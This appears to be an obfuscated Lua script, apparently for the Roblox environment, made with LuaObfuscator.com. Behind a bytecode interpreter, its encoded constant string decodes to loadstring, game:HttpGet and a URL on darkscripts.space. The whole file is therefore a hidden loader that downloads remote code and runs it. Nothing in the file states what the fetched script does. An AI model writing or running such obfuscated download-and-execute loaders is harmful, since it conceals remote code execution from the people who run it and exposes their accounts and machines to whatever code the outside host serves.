--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v89=v5(v80,v19);v19=nil;return v89;else return v80;end end end);local function v20(v31,v32,v33) if v33 then local v81=(v31/((5 -(880 -(282 + 595)))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -((2494 -(1523 + 114)) + 74)))) ;return v81-(v81%(569 -(367 + 181 + 20))) ;else local v82=927 -(214 + 713) ;local v83;while true do if (v82==0) then v83=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v83 + v83))>=v83) and 1) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37=1270 -(226 + 1044) ;local v38;local v39;local v40;local v41;while true do if (v37==((7 -3) -3)) then return (v41 * (16777333 -(32 + 85))) + (v40 * (64226 + 1310)) + (v39 * (57 + 199)) + v38 ;end if (v37==(957 -(892 + 65))) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 4 ;v37=(351 -(87 + 263)) -(180 -(67 + 113)) ;end end end local function v24() local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,2 -1 ,15 + 5 ) * (2^(127 -95))) + v42 ;local v46=v20(v43,(3057 -2084) -((820 -(10 + 8)) + 150) ,31);local v47=((v20(v43,85 -53 )==(1 -0)) and  -(1 + 0)) or (998 -(915 + 82)) ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * ((0 -0) -0) ;else v46=1188 -(1069 + 118) ;v44=0 -0 ;end elseif (v46==((4919 -(416 + 26)) -2430)) then return ((v45==(0 + 0)) and (v47 * (1/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1015 + 8) ) * (v44 + (v45/(2^((2691 -1848) -(368 + 423))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 -0) );v18=v18 + v48 ;local v50={};for v64=1, #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 736 -(397 + 339) ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do if (v51== #"!") then local v86=(function() return 0;end)();while true do if (v86~=1) then else for v105= #"!",v56 do local v106=(function() return 438 -(262 + 176) ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (v106==(1722 -(345 + 1376))) then v109=(function() return nil;end)();while true do if (v107~=(688 -(198 + 490))) then else local v115=(function() return 0;end)();local v116=(function() return;end)();while true do if (v115==0) then v116=(function() return 0;end)();while true do if (v116~=0) then else local v165=(function() return 0 -0 ;end)();while true do if (v165==0) then v108=(function() return v21();end)();v109=(function() return nil;end)();v165=(function() return 2 -1 ;end)();end if (v165~=(1207 -(696 + 510))) then else v116=(function() return 1 -0 ;end)();break;end end end if (v116~=(1263 -(1091 + 171))) then else v107=(function() return 1 + 0 ;end)();break;end end break;end end end if (1==v107) then if (v108== #"~") then v109=(function() return v21()~=0 ;end)();elseif (v108==2) then v109=(function() return v24();end)();elseif (v108== #"gha") then v109=(function() return v25();end)();end v57[v105]=(function() return v109;end)();break;end end break;end if (v106==0) then v107=(function() return 0 -0 ;end)();v108=(function() return nil;end)();v106=(function() return 1;end)();end end end v55[ #"gha"]=(function() return v21();end)();v86=(function() return 6 -4 ;end)();end if (v86==0) then v56=(function() return v23();end)();v57=(function() return {};end)();v86=(function() return 375 -(123 + 251) ;end)();end if (v86~=2) then else v51=(function() return 9 -7 ;end)();break;end end end if ((700 -(208 + 490))~=v51) then else for v90= #":",v23() do local v91=(function() return v21();end)();if (v20(v91, #"!", #"]")==(0 + 0)) then local v101=(function() return 0;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v101~=(2 + 1)) then else if (v20(v103, #"asd", #"-19")== #"{") then v104[ #"asd1"]=(function() return v57[v104[ #".dev"]];end)();end v52[v90]=(function() return v104;end)();break;end if ((836 -(660 + 176))~=v101) then else v102=(function() return v20(v91,1 + 1 , #"91(");end)();v103=(function() return v20(v91, #"xnxx",6);end)();v101=(function() return 203 -(14 + 188) ;end)();end if (v101==(677 -(534 + 141))) then if (v20(v103, #">", #"]")~= #"\\") then else v104[2]=(function() return v57[v104[2]];end)();end if (v20(v103,2,1 + 1 )~= #",") then else v104[ #"91("]=(function() return v57[v104[ #"xnx"]];end)();end v101=(function() return 3 + 0 ;end)();end if (v101==1) then local v111=(function() return 0 + 0 ;end)();while true do if (v111~=(0 -0)) then else v104=(function() return {v22(),v22(),nil,nil};end)();if (v102==0) then local v149=(function() return 0;end)();local v150=(function() return;end)();while true do if (v149~=0) then else v150=(function() return 0 -0 ;end)();while true do if (v150~=(0 + 0)) then else v104[ #"gha"]=(function() return v22();end)();v104[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v102== #"!") then v104[ #"asd"]=(function() return v23();end)();elseif (v102==(2 + 0)) then v104[ #"xnx"]=(function() return v23() -((398 -(115 + 281))^16) ;end)();elseif (v102== #"nil") then local v168=(function() return 0;end)();local v169=(function() return;end)();while true do if (v168~=(0 -0)) then else v169=(function() return 0 + 0 ;end)();while true do if (v169==(0 -0)) then v104[ #"91("]=(function() return v23() -(2^16) ;end)();v104[ #"0313"]=(function() return v22();end)();break;end end break;end end end v111=(function() return 3 -2 ;end)();end if (v111~=1) then else v101=(function() return 2;end)();break;end end end end end end for v92= #"{",v23() do v53[v92-#"~" ]=(function() return v28();end)();end return v55;end if (v51~=0) then else local v87=(function() return 867 -(550 + 317) ;end)();local v88=(function() return;end)();while true do if (v87==(0 -0)) then v88=(function() return 0;end)();while true do if (v88==0) then v52=(function() return {};end)();v53=(function() return {};end)();v88=(function() return 1 -0 ;end)();end if (v88==(2 -1)) then v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v88=(function() return 287 -(134 + 151) ;end)();end if (v88~=2) then else v51=(function() return  #"!";end)();break;end end break;end end end end end local function v29(v58,v59,v60) local v61=v58[1666 -(970 + 695) ];local v62=v58[3 -1 ];local v63=v58[3];return function(...) local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=1991 -(582 + 1408) ;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -(1 -0) ;local v75={};local v76={};for v84=0 -0 ,v74 do if (v84>=v68) then v72[v84-v68 ]=v73[v84 + ((4389 -2564) -(1195 + 629)) ];else v76[v84]=v73[v84 + 1 ];end end local v77=(v74-v68) + (1 -0) ;local v78;local v79;while true do local v85=241 -(187 + 54) ;while true do if (v85==1) then if (v79<=((2250 -1463) -(162 + 618))) then if ((4148>=3342) and (v79<=(3 + 0))) then if (v79<=1) then if (v79>(0 + 0)) then local v118=0 -0 ;local v119;local v120;local v121;local v122;while true do if ((2 -0)==v118) then for v161=v119,v71 do v122=v122 + 1 + (1900 -(106 + 1794)) ;v76[v161]=v120[v122];end break;end if (v118==(1637 -(1373 + 263))) then v71=(v121 + v119) -1 ;v122=0;v118=1002 -(451 + 549) ;end if ((4630==4630) and (v118==(0 + 0 + 0))) then v119=v78[2];v120,v121=v69(v76[v119](v13(v76,v119 + (1 -(0 + 0)) ,v78[4 -1 ])));v118=1385 -(746 + 638) ;end end else local v123=v78[(2 -1) + 1 ];local v124,v125=v69(v76[v123](v13(v76,v123 + (1 -0) ,v78[344 -(218 + 123) ])));v71=(v125 + v123) -((4283 -2701) -((1649 -(4 + 110)) + 46)) ;local v126=0 + 0 ;for v151=v123,v71 do v126=v126 + 1 ;v76[v151]=v124[v126];end end elseif ((v79>(1 + 1)) or (1434<=480)) then v76[v78[562 -(306 + 254) ]]=v60[v78[587 -(57 + 527) ]];else local v129=v78[1 + (1428 -(41 + 1386)) ];local v130=v76[v78[3]];v76[v129 + (1 -0) ]=v130;v76[v129]=v130[v78[1471 -(899 + 568) ]];end elseif (v79<=(4 + 1)) then if (v79>(9 -5)) then do return;end else local v134=v78[2];v76[v134]=v76[v134](v13(v76,v134 + 1 ,v71));end elseif ((v79==(609 -(268 + (438 -(17 + 86))))) or (74>143)) then v76[v78[2]]=v78[293 -(41 + 19 + 230) ];else v76[v78[574 -(426 + 146) ]]=v78[1 + 2 ]~=(1456 -(282 + 1174)) ;end elseif (v79<=(822 -(569 + 242))) then if ((3540>2683) and (18<2112) and (v79<=(25 -16))) then if ((4794>=3275) and (v79>8)) then v76[v78[1 + (1 -0) ]]=v78[3]~=(1024 -(706 + 318)) ;else local v140=v78[2];v76[v140]=v76[v140](v13(v76,v140 + (1252 -((2087 -1366) + 530)) ,v71));end elseif ((1484==1484) and (v79>(1281 -(945 + (492 -(122 + 44)))))) then local v142=0 -0 ;local v143;local v144;while true do if ((1432<3555) and (v142==(1 + 0))) then v76[v143 + ((1210 -509) -(271 + (1422 -993))) ]=v144;v76[v143]=v144[v78[4 + 0 ]];break;end if ((v142==0) or (1065>3578)) then v143=v78[2];v144=v76[v78[1503 -(1408 + 92) ]];v142=1087 -(461 + 625) ;end end else v76[v78[(1050 + 240) -(993 + 295) ]]=v60[v78[1 + 2 ]];end elseif ((v79<=(1184 -(418 + 753))) or (4795<1407)) then if (v79==(5 + 7)) then do return;end else v76[v78[1 + 1 + 0 ]]();end elseif (v79==(5 + 9)) then v76[v78[1 + (1 -0) ]]=v78[532 -(406 + (188 -(30 + 35))) ];else v76[v78[1771 -(1749 + 20) ]]();end v70=v70 + 1 + 0 ;break;end if ((1097<=1628) and (v85==(1322 -(1249 + 73)))) then v78=v66[v70];v79=v78[1 + 0 + 0 ];v85=1146 -(466 + 679) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403303Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F623039376163346636662E6C756100093Q00120A3Q00013Q00120A000100023Q00200B00010001000300120E000300044Q0007000400014Q0001000100044Q00085Q00022Q000F3Q000100012Q00053Q00017Q00",v9(),...);
